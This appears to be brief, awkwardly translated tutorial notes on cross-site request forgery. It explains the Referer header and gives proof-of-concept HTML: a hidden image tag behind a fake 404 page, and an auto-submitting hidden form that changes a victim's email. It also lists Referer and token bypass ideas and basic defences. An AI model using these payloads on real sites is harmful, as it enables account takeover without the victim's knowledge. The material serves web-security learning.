CSRF (Cross-site request forgery) Cross-site request forgery, also known as "One Click Attack" or Session Riding, usually abbreviated as CSRF or XSRF, is a malicious use of websites. Using the victim's identity authentication information (cookie, session, etc.) that has not yet expired, mutagenize clicks on malicious links or visit pages containing attack code, and send requests to the server as the victim without the victim's knowledge, thus completing the illegal operation. operate.
HTTP Referer: Referer is part of the HTTP request header . When the browser (or simulated browser behavior) web sends a request to the server, the header information contains Referer . The Referer in the Http protocol header is mainly used to let the server determine the source page, that is, which page the user came from. It is usually used by the website to count the source of the user, whether it comes from the search page, or is linked from other websites, or from other websites. Bookmarks, etc., so that the website can be positioned reasonably.
Types of:
1. GET request.
To verify, simply log in to your account on another browser and access the URL. When using, put the URL in the html tag for disguise.
POC construction:
<img src="url" border="0" style="display: none;"/>
<h1>404</h1>
<h2>file not found.</h2>
2. POST request.
The HTML form needs to be constructed. Burp can be constructed directly or written by yourself
POC construction:
<!DOCTYPE html>
<html>
<body>
<form name="poc" action="" method="POST" type="hidden">
<input type="hidden" name="newEmail" value="xx"/>
<input type="submit" value="submit request" style="display: none;">
</form>
</body>
<script>
poc.submit();
</script>
</html>
basically bypass
(1).referer
(1). Whether it belongs to the specified domain
(2). Specify keywords
(3) Whether there is a designated domain
(4) When empty
(2).token
protection
(1). Verification code
(2) token: encrypted, random token
(3) Determine whether the request has the same origin as the current page through the request header